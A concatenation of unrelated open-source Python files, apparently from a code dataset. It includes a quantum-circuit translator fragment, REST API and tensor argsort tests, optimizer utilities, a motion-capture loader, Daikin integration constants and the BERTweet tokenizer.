gate_num += len(paramlist_ga) * function_table[op]
cx_num += len(paramlist_ga) * cx_table[op]
# User-defined gate function definition
elif op == "gate":
ll = l.split(" ")
gate_name = ll[1].strip()
qregs = ll[2].strip().split(",")
params = ""
pos = gate_name.find('(')
n = 0
cx = 0
if pos != -1: #extra params
gate_name = gate_name[:pos]
params = gate_name[pos+1:gate_name.find(')')].strip()
s = "def " + gate_name \
+ "(sim"
if params != "":
for param in params.split(','):
s += ", " + param
for qreg in qregs:
s += ", " + qreg
s += "):\n"
i = i+1 #jump {
l = lines[i].strip().strip('\n')
while not l.startswith("}"):
#print ("Parsing " + l)
ll = l.split(";")
for g in ll:
s1, n1, cx1 = function_gate(g,i)
s += s1
n += n1
cx += cx1
i = i+1
l = lines[i].strip().strip('\n')
s += "\n"
function_table[gate_name] = n
cx_table[gate_name] = cx
#Define quantum register, build up global array
elif op == "qreg":
ll = l.split(" ")[1]
field = ll[:ll.find("[")]
bits = int(ll[ll.find("[")+1:ll.find("]")])
global_array[field] = qreg_idx
field_length[field] = bits
qreg_idx += bits
#Built-in gate invokation
elif op in GATE_TABLE:
ss, n, cx = builtin_gate(l,i)
gate_num += n
s += ss
cx_num += cx
#Other keywords not-realized
elif op in other_keys:
s = ""
else:
print ("Unknown symbol: " + op)
outfile.write(s)
i = i+1
s = "\nsim.upload()\n"
s += "sim.run()\n"
s += "sim.measure(10)\n"
outfile.write(s)
# Main Program
parser = argparse.ArgumentParser(description='SV-Sim Assembler for OpenQASM-V2.0: translating OpenQASM to SV-sim native simulation circuit code.')
parser.add_argument('--input', '-i', help='input OpenQASM file, such as adder.qasm')
parser.add_argument('--output', '-o', default='svsim_circuit.py', help='output SV-Sim circuit python file (default: svsim_circuit.py)')
args = parser.parse_args()
#print (args.input)
# Parsing input and Writing to output
qasmfile = open(args.input, "r")
svfile = open(args.output, "w")
svfile.write("import sys\n")
svfile.write("import svsim_py_omp_wrapper as svsim\n\n")
svfile.write("if (len(sys.argv) != 3):\n")
svfile.write("\tprint('$python circuit.py n_qubits n_gpus')\n")
svfile.write("\texit()\n\n")
parse(qasmfile, svfile)
svfile.close()
qasmfile.close()
maxvalidx = max(global_array, key=global_array.get)
nqubits = global_array[maxvalidx] + field_length[maxvalidx]
print ("== SV-Sim: Translating " + args.input + " to " + args.output + " ==")
print ("Number of qubits: " + str(nqubits))
print ("Number of basic gates: " + str(gate_num))
print ("Number of cnot gates: " + str(cx_num))
#cmd = "python " + args.output + " " + str(nqubits)
#os.system(cmd)
| 37.473973 | 146 | 0.501608 |
7dedf5a52db7af2a6c5e4b1ee3f502aec7c345ae | 7,550 | py | Python | slugs/tests/integration/test_slugs.py | OpenKMIP/SLUGS | 807b653442d0c4ba2a00b6e7dee5c7b988001a67 | [
"Apache-2.0"
] | 3 | 2019-01-26T06:31:22.000Z | 2019-05-07T06:21:17.000Z | slugs/tests/integration/test_slugs.py | OpenKMIP/SLUGS | 807b653442d0c4ba2a00b6e7dee5c7b988001a67 | [
"Apache-2.0"
] | 14 | 2018-03-14T14:36:49.000Z | 2019-01-25T22:23:39.000Z | slugs/tests/integration/test_slugs.py | OpenKMIP/SLUGS | 807b653442d0c4ba2a00b6e7dee5c7b988001a67 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2018, The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pytest
import requests
import testtools
@pytest.mark.usefixtures("url")
class TestSLUGSAPI(testtools.TestCase):
def setUp(self):
super(TestSLUGSAPI, self).setUp()
def test_request_root(self):
"""
Test that a root-level request yields the right response..
"""
response = requests.get(self.url + '/')
self.assertEqual(response.status_code, 200)
json = response.json()
self.assertIsInstance(json, dict)
self.assertEqual(len(json.keys()), 2)
self.assertIn('users', json.keys())
self.assertIn('groups', json.keys())
users = json.get('users')
groups = json.get('groups')
self.assertIsInstance(users, list)
self.assertIsInstance(groups, list)
self.assertEqual(len(users), 2)
self.assertEqual(len(groups), 3)
self.assertIn('John', users)
self.assertIn('Jane', users)
self.assertIn('Human', groups)
self.assertIn('Male', groups)
self.assertIn('Female', groups)
def test_request_users(self):
"""
Test that a users request yields the right response..
"""
response = requests.get(self.url + '/users')
self.assertEqual(response.status_code, 200)
json = response.json()
self.assertIsInstance(json, dict)
self.assertEqual(len(json.keys()), 1)
self.assertIn('users', json.keys())
users = json.get('users')
self.assertIsInstance(users, list)
self.assertEqual(len(users), 2)
self.assertIn('John', users)
self.assertIn('Jane', users)
def test_request_groups(self):
"""
Test that a groups request yields the right response..
"""
response = requests.get(self.url + '/groups')
self.assertEqual(response.status_code, 200)
json = response.json()
self.assertIsInstance(json, dict)
self.assertEqual(len(json.keys()), 1)
self.assertIn('groups', json.keys())
groups = json.get('groups')
self.assertIsInstance(groups, list)
self.assertEqual(len(groups), 3)
self.assertIn('Human', groups)
self.assertIn('Male', groups)
self.assertIn('Female', groups)
def test_request_invalid_resource(self):
"""
Test that a request for an invalid resource yields the right response.
"""
response = requests.get(self.url + '/invalid')
self.assertEqual(response.status_code, 404)
def test_request_users_user(self):
"""
Test that a users request for a specific user yields the right
response.
"""
response = requests.get(self.url + '/users/John')
self.assertEqual(response.status_code, 200)
self.assertIsNone(response.json())
def test_request_users_user_invalid(self):
"""
Test that a users request for an invalid user yields the right
response.
"""
response = requests.get(self.url + '/users/invalid')
self.assertEqual(response.status_code, 404)
def test_request_groups_group(self):
"""
Test that a groups request for a specific group yields the right
response.
"""
response = requests.get(self.url + '/groups/Human')
self.assertEqual(response.status_code, 200)
self.assertIsNone(response.json())
def test_request_groups_group_invalid(self):
"""
Test that a groups request for an invalid group yields the right
response.
"""
response = requests.get(self.url + '/groups/invalid')
self.assertEqual(response.status_code, 404)
def test_request_users_user_groups(self):
"""
Test that a groups request for a specific user yields the right result.
"""
response = requests.get(self.url + '/users/John/groups')
self.assertEqual(response.status_code, 200)
json = response.json()
self.assertIsInstance(json, dict)
self.assertEqual(len(json.keys()), 1)
self.assertIn('groups', json.keys())
groups = json.get('groups')
self.assertIsInstance(groups, list)
self.assertEqual(len(groups), 2)
self.assertIn('Human', groups)
self.assertIn('Male', groups)
def test_request_users_user_invalid_resource(self):
"""
Test that a users request for an invalid user resource yields the
right result.
"""
response = requests.get(self.url + '/users/John/invalid')
self.assertEqual(response.status_code, 404)
def test_request_groups_group_users(self):
"""
Test that a users request for a specific group yields the right result.
"""
response = requests.get(self.url + '/groups/Human/users')
self.assertEqual(response.status_code, 200)
json = response.json()
self.assertIsInstance(json, dict)
self.assertEqual(len(json.keys()), 1)
self.assertIn('users', json.keys())
users = json.get('users')
self.assertIsInstance(users, list)
self.assertEqual(len(users), 2)
self.assertIn('John', users)
self.assertIn('Jane', users)
def test_request_groups_group_invalid_resource(self):
"""
Test that a groups request for an invalid group resource yields the
right result.
"""
response = requests.get(self.url + '/groups/Human/invalid')
self.assertEqual(response.status_code, 404)
def test_request_users_user_groups_group(self):
"""
Test that a groups request for a specific group for a specific user
yields the right result.
"""
response = requests.get(self.url + '/users/John/groups/Human')
self.assertEqual(response.status_code, 200)
self.assertIsNone(response.json())
def test_request_users_user_groups_group_invalid(self):
"""
Test that a groups request for an invalid group for a specific user
yields the right result.
"""
response = requests.get(self.url + '/users/John/groups/invalid')
self.assertEqual(response.status_code, 404)
def test_request_groups_group_users_user(self):
"""
Test that a users request for a specific user for a specific group
yields the right result.
"""
response = requests.get(self.url + '/groups/Female/users/Jane')
self.assertEqual(response.status_code, 200)
self.assertIsNone(response.json())
def test_request_groups_group_users_user_invalid(self):
"""
Test that a users request for an invalid user for a specific group
yields the right result.
"""
response = requests.get(self.url + '/groups/Female/users/invalid')
self.assertEqual(response.status_code, 404)
| 32.683983 | 79 | 0.636424 |
981ccb922d0b9e710a140b5259908c1e55c67ac4 | 2,430 | py | Python | python/oneflow/test/modules/test_argsort.py | Zhangchangh/oneflow | 4ea3935458cc83dcea0abd88dd613f09c57dc01a | [
"Apache-2.0"
] | 1 | 2021-09-13T02:34:53.000Z | 2021-09-13T02:34:53.000Z | python/oneflow/test/modules/test_argsort.py | Zhangchangh/oneflow | 4ea3935458cc83dcea0abd88dd613f09c57dc01a | [
"Apache-2.0"
] | null | null | null | python/oneflow/test/modules/test_argsort.py | Zhangchangh/oneflow | 4ea3935458cc83dcea0abd88dd613f09c57dc01a | [
"Apache-2.0"
] | 1 | 2021-01-17T03:34:39.000Z | 2021-01-17T03:34:39.000Z | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
from test_util import GenArgList, type_name_to_flow_type
import oneflow as flow
import oneflow.unittest
def _test_argsort(test_case, data_shape, axis, descending, data_type, device):
input = flow.Tensor(
np.random.randn(*data_shape),
dtype=type_name_to_flow_type[data_type],
device=flow.device(device),
)
of_out = flow.argsort(input, dim=axis, descending=descending)
np_input = -input.numpy() if descending else input.numpy()
np_out = np.argsort(np_input, axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_tensor_argsort(test_case, data_shape, axis, descending, data_type, device):
input = flow.Tensor(
np.random.randn(*data_shape),
dtype=type_name_to_flow_type[data_type],
device=flow.device(device),
)
of_out = input.argsort(dim=axis, descending=descending)
np_input = -input.numpy() if descending else input.numpy()
np_out = np.argsort(np_input, axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
@flow.unittest.skip_unless_1n1d()
class TestArgsort(flow.unittest.TestCase):
def test_argsort(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [_test_argsort, _test_tensor_argsort]
arg_dict["data_shape"] = [(2, 6, 5, 4), (3, 4, 8)]
arg_dict["axis"] = [-1, 0, 2]
arg_dict["descending"] = [True, False]
arg_dict["data_type"] = ["double", "float32", "int32"]
arg_dict["device"] = ["cpu", "cuda"]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
if __name__ == "__main__":
unittest.main()
| 35.735294 | 85 | 0.709053 |
d6788e3f4bc808414fadc8cd434abfb5b2b4000c | 3,901 | py | Python | optimizer/util/util.py | efuller-gov/dm3k | 6cd95d647d1dfe188d68601d06ae9c92d2e1acf4 | [
"CC-BY-4.0",
"Apache-2.0",
"CC0-1.0"
] | 2 | 2021-11-29T14:46:43.000Z | 2021-12-29T02:22:34.000Z | optimizer/util/util.py | efuller-gov/dm3k | 6cd95d647d1dfe188d68601d06ae9c92d2e1acf4 | [
"CC-BY-4.0",
"Apache-2.0",
"CC0-1.0"
] | null | null | null | optimizer/util/util.py | efuller-gov/dm3k | 6cd95d647d1dfe188d68601d06ae9c92d2e1acf4 | [
"CC-BY-4.0",
"Apache-2.0",
"CC0-1.0"
] | 1 | 2021-10-03T23:20:52.000Z | 2021-10-03T23:20:52.000Z | """
Contains utility functions used by all of optimizer
"""
import logging
import os
import time
from datetime import datetime
import psutil
log = logging.getLogger(__name__)
convertToMB = float(2 ** 20)
process = psutil.Process()
FULL_HOUSE_FULL_TRACE_KEYS = [
"allocated",
"activity",
"budget_used",
"picked",
"resource",
"selected",
"value",
]
FULL_HOUSE_FULL_TRACE_KEYS_ORIG = [
"container_name",
"child_budget_used",
"child_resource",
"child_activity",
"parent_budget_used",
"parent_resource",
"parent_activity",
"selected",
"value",
]
FULL_HOUSE_INPUT_DICT_KEYS = [
"req_child_amt",
"req_parent_amt",
"avail_child_amt",
"avail_parent_amt",
"activity_children",
"child_possible_allocations",
"parent_possible_allocations",
"child_score",
"resource_families",
]
FULL_HOUSE_INPUT_LIST_KEYS = ["child_resources", "parent_resources", "child_activities", "parent_activities", "force_list", "forbid_list"]
FULL_HOUSE_INPUT_KEYS = FULL_HOUSE_INPUT_DICT_KEYS + FULL_HOUSE_INPUT_LIST_KEYS + ["parent_budget_name"] + ["child_budget_name"]
def remove_old_temp_files(dir_name, days=0, hours=0, minutes=0, seconds=0):
"""
Remove old temp files. Defaults to keeping only temp files created in last hour
"""
now = time.time()
hours = (days * 24) + hours
minutes = (hours * 60) + minutes
seconds = (minutes * 60) + seconds
if seconds == 0:
seconds = 3600
old = now - seconds
for f in os.listdir(dir_name):
try:
path = os.path.join(dir_name, f)
if os.stat(path).st_ctime < old:
os.remove(path)
except FileNotFoundError as e:
# Fail silently if this exception occurs
log.warning(e)
def time_mem_stamp():
"""
return the current time and memory usage
:return time_stamp: the current time in as datetime object.
:return mem_stamp: the current memory amount as
"""
return datetime.now(), process.memory_info()[0] / convertToMB
def fh_append(append_dict, key, value, type_resources=None):
"""
Helper method that will set the given default value (typically list or dict) if the key does not exist in the append_dict yet
:param append_dict:
:param key:
:param value:
:param str type_resources: Set to "child_resources" or "parent_resources" if modifying the resource_families dict
:return: None
"""
default_type = []
if type_resources is not None:
default_type = {"parent_resources": [], "child_resources": []}
append_dict.setdefault(key, default_type)
if type_resources is None:
if value not in append_dict[key]:
append_dict[key].append(value)
else:
if value not in append_dict[key][type_resources]:
append_dict[key][type_resources].append(value)
#
def fh_extend(extend_dict, key, values, type_resources=None):
"""
Helper method that will set the given default value (typically list or dict) if the key does not exist in the extend_dict yet
:param extend_dict:
:param key:
:param values:
:param str type_resources: Set to "child_resources" or "parent_resources" if modifying the resource_families dict
:return: None
"""
default_type = []
if type_resources is not None:
default_type = {"parent_resources": [], "child_resources": []}
extend_dict.setdefault(key, default_type)
if type_resources is None:
if set(values).intersection(set(extend_dict[key])):
log.warning("Adding repeated values to list at key %s", key)
extend_dict[key].extend(values)
else:
if set(values).intersection(set(extend_dict[key][type_resources])):
log.warning("Adding repeated values to list at key %s", key)
extend_dict[key][type_resources].extend(values)
| 29.11194 | 138 | 0.672648 |
42a8e3a7dc3d90d963a200048be3c8e39bf8b86f | 1,250 | py | Python | examples/pybullet/gym/pybullet_envs/deep_mimic/env/motion_capture_data.py | joonkyu4220/bullet3 | a5fb6c158f6cb744f476d7f1a5fbf6bf611cd9e1 | [
"Zlib"
] | null | null | null | examples/pybullet/gym/pybullet_envs/deep_mimic/env/motion_capture_data.py | joonkyu4220/bullet3 | a5fb6c158f6cb744f476d7f1a5fbf6bf611cd9e1 | [
"Zlib"
] | null | null | null | examples/pybullet/gym/pybullet_envs/deep_mimic/env/motion_capture_data.py | joonkyu4220/bullet3 | a5fb6c158f6cb744f476d7f1a5fbf6bf611cd9e1 | [
"Zlib"
] | null | null | null | import json
import math
class MotionCaptureData(object):
def __init__(self):
self.Reset()
def Reset(self):
self._motion_data = []
def Load(self, path):
with open(path, 'r') as f:
self._motion_data = json.load(f)
def NumFrames(self):
return len(self._motion_data['Frames'])
def KeyFrameDuration(self):
return self._motion_data['Frames'][0][0]
def getCycleTime(self):
keyFrameDuration = self.KeyFrameDuration()
cycleTime = keyFrameDuration * (self.NumFrames() - 1)
return cycleTime
def calcCycleCount(self, simTime, cycleTime):
phases = simTime / cycleTime
count = math.floor(phases)
loop = True
#count = (loop) ? count : cMathUtil::Clamp(count, 0, 1);
return count
def computeCycleOffset(self):
firstFrame = 0
lastFrame = self.NumFrames() - 1
frameData = self._motion_data['Frames'][0]
frameDataNext = self._motion_data['Frames'][lastFrame]
basePosStart = [frameData[1], frameData[2], frameData[3]]
basePosEnd = [frameDataNext[1], frameDataNext[2], frameDataNext[3]]
self._cycleOffset = [
basePosEnd[0] - basePosStart[0], basePosEnd[1] - basePosStart[1],
basePosEnd[2] - basePosStart[2]
]
return self._cycleOffset
| 26.041667 | 73 | 0.6696 |
fbd838b9e47c80cc6171996f020cf0b334c7d92c | 565 | py | Python | homeassistant/components/daikin/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | homeassistant/components/daikin/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 24,710 | 2016-04-13T08:27:26.000Z | 2020-03-02T12:59:13.000Z | homeassistant/components/daikin/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Constants for Daikin."""
DOMAIN = "daikin"
ATTR_TARGET_TEMPERATURE = "target_temperature"
ATTR_INSIDE_TEMPERATURE = "inside_temperature"
ATTR_OUTSIDE_TEMPERATURE = "outside_temperature"
ATTR_TOTAL_POWER = "total_power"
ATTR_COOL_ENERGY = "cool_energy"
ATTR_HEAT_ENERGY = "heat_energy"
ATTR_HUMIDITY = "humidity"
ATTR_TARGET_HUMIDITY = "target_humidity"
ATTR_COMPRESSOR_FREQUENCY = "compressor_frequency"
ATTR_TOTAL_ENERGY_TODAY = "total_energy_today"
ATTR_STATE_ON = "on"
ATTR_STATE_OFF = "off"
CONF_UUID = "uuid"
KEY_MAC = "mac"
KEY_IP = "ip"
TIMEOUT = 60
| 23.541667 | 50 | 0.79646 |
aaeffd73800c8e3c6935b5b0dfe6b0a39d856647 | 27,592 | py | Python | src/transformers/models/bertweet/tokenization_bertweet.py | theainerd/transformers | f7328de46dbeda4992a093a0501932bf0fc7b76f | [
"Apache-2.0"
] | 34 | 2021-07-05T02:44:31.000Z | 2022-03-28T14:39:57.000Z | src/transformers/models/bertweet/tokenization_bertweet.py | theainerd/transformers | f7328de46dbeda4992a093a0501932bf0fc7b76f | [
"Apache-2.0"
] | 3 | 2021-07-22T15:49:44.000Z | 2022-03-19T08:46:27.000Z | src/transformers/models/bertweet/tokenization_bertweet.py | theainerd/transformers | f7328de46dbeda4992a093a0501932bf0fc7b76f | [
"Apache-2.0"
] | 6 | 2021-07-05T02:44:32.000Z | 2022-02-14T10:10:13.000Z | # coding=utf-8
# Copyright (c) 2020, VinAI Research and the HuggingFace Inc. team.
# Copyright 2018 The Open AI Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Tokenization classes for BERTweet """
import html
import os
import re
from shutil import copyfile
from typing import List, Optional, Tuple
import regex
from ...tokenization_utils import PreTrainedTokenizer
from ...utils import logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.txt",
"merges_file": "bpe.codes",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"vinai/bertweet-base": "https://huggingface.co/vinai/bertweet-base/resolve/main/vocab.txt",
},
"merges_file": {
"vinai/bertweet-base": "https://huggingface.co/vinai/bertweet-base/resolve/main/bpe.codes",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"vinai/bertweet-base": 128,
}
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
pairs = set(pairs)
return pairs
class BertweetTokenizer(PreTrainedTokenizer):
"""
Constructs a BERTweet tokenizer, using Byte-Pair-Encoding.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizer` which contains most of the main methods.
Users should refer to this superclass for more information regarding those methods.
Args:
vocab_file (:obj:`str`):
Path to the vocabulary file.
merges_file (:obj:`str`):
Path to the merges file.
normalization (:obj:`bool`, `optional`, defaults to :obj:`False`)
Whether or not to apply a normalization preprocess.
bos_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
.. note::
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the :obj:`cls_token`.
eos_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The end of sequence token.
.. note::
When building a sequence using special tokens, this is not the token that is used for the end of
sequence. The token used is the :obj:`sep_token`.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (:obj:`str`, `optional`, defaults to :obj:`"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(
self,
vocab_file,
merges_file,
normalization=False,
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
**kwargs
):
super().__init__(
normalization=normalization,
bos_token=bos_token,
eos_token=eos_token,
sep_token=sep_token,
cls_token=cls_token,
unk_token=unk_token,
pad_token=pad_token,
mask_token=mask_token,
**kwargs,
)
try:
from emoji import demojize
self.demojizer = demojize
except ImportError:
logger.warning(
"emoji is not installed, thus not converting emoticons or emojis into text. Please install emoji: pip3 install emoji"
)
self.demojizer = None
self.vocab_file = vocab_file
self.merges_file = merges_file
self.encoder = {}
self.encoder[self.bos_token] = 0
self.encoder[self.pad_token] = 1
self.encoder[self.eos_token] = 2
self.encoder[self.unk_token] = 3
self.add_from_file(vocab_file)
self.decoder = {v: k for k, v in self.encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
merges = merges_handle.read().split("\n")[:-1]
merges = [tuple(merge.split()[:-1]) for merge in merges]
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {}
self.normalization = normalization
self.tweetPreprocessor = TweetTokenizer()
self.special_puncts = {"’": "'", "…": "..."}
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A BERTweet sequence has the following format:
- single sequence: ``<s> X </s>``
- pair of sequences: ``<s> A </s></s> B </s>``
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` method.
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
:obj:`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
if token_ids_1 is not None:
raise ValueError(
"You should not supply a second sequence if the provided sequence of "
"ids is already formatted with special tokens for the model."
)
return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0))
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. BERTweet does
not make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
word = tuple(list(word[:-1]) + [word[-1] + "</w>"])
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = "@@ ".join(word)
word = word[:-4]
self.cache[token] = word
return word
def _tokenize(self, text):
"""Tokenize a string."""
if self.normalization: # Perform Tweet normalization before performing BPE
text = self.normalizeTweet(text)
split_tokens = []
words = re.findall(r"\S+\n?", text)
for token in words:
split_tokens.extend([t for t in self.bpe(token).split(" ")])
return split_tokens
def normalizeTweet(self, tweet):
"""
Normalize a raw Tweet
"""
for punct in self.special_puncts:
tweet = tweet.replace(punct, self.special_puncts[punct])
tokens = self.tweetPreprocessor.tokenize(tweet)
normTweet = " ".join([self.normalizeToken(token) for token in tokens])
normTweet = (
normTweet.replace("cannot ", "can not ")
.replace("n't ", " n't ")
.replace("n 't ", " n't ")
.replace("ca n't", "can't")
.replace("ai n't", "ain't")
)
normTweet = (
normTweet.replace("'m ", " 'm ")
.replace("'re ", " 're ")
.replace("'s ", " 's ")
.replace("'ll ", " 'll ")
.replace("'d ", " 'd ")
.replace("'ve ", " 've ")
)
normTweet = (
normTweet.replace(" p . m .", " p.m.")
.replace(" p . m ", " p.m ")
.replace(" a . m .", " a.m.")
.replace(" a . m ", " a.m ")
)
return " ".join(normTweet.split())
def normalizeToken(self, token):
"""
Normalize tokens in a Tweet
"""
lowercased_token = token.lower()
if token.startswith("@"):
return "@USER"
elif lowercased_token.startswith("http") or lowercased_token.startswith("www"):
return "HTTPURL"
elif len(token) == 1:
if token in self.special_puncts:
return self.special_puncts[token]
if self.demojizer is not None:
return self.demojizer(token)
else:
return token
else:
return token
def _convert_token_to_id(self, token):
""" Converts a token (str) in an id using the vocab. """
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
""" Converts a sequence of tokens (string) in a single string. """
out_string = " ".join(tokens).replace("@@ ", "").strip()
return out_string
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
out_vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
out_merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):
copyfile(self.vocab_file, out_vocab_file)
if os.path.abspath(self.merges_file) != os.path.abspath(out_merge_file):
copyfile(self.merges_file, out_merge_file)
return out_vocab_file, out_merge_file
# def decode(self, token_ids, skip_special_tokens=False, clean_up_tokenization_spaces=True):
# filtered_tokens = ' '.join(self.convert_ids_to_tokens(token_ids, skip_special_tokens=skip_special_tokens))
# tokens_generated_so_far = re.sub('(@@ )', '', string=filtered_tokens)
# tokens_generated_so_far = re.sub('(@@ ?$)', '', string=tokens_generated_so_far)
# return ''.join(tokens_generated_so_far)
def add_from_file(self, f):
"""
Loads a pre-existing dictionary from a text file and adds its symbols to this instance.
"""
if isinstance(f, str):
try:
with open(f, "r", encoding="utf-8") as fd:
self.add_from_file(fd)
except FileNotFoundError as fnfe:
raise fnfe
except UnicodeError:
raise Exception(f"Incorrect encoding detected in {f}, please rebuild the dataset")
return
lines = f.readlines()
for lineTmp in lines:
line = lineTmp.strip()
idx = line.rfind(" ")
if idx == -1:
raise ValueError("Incorrect dictionary format, expected '<token> <cnt>'")
word = line[:idx]
self.encoder[word] = len(self.encoder)
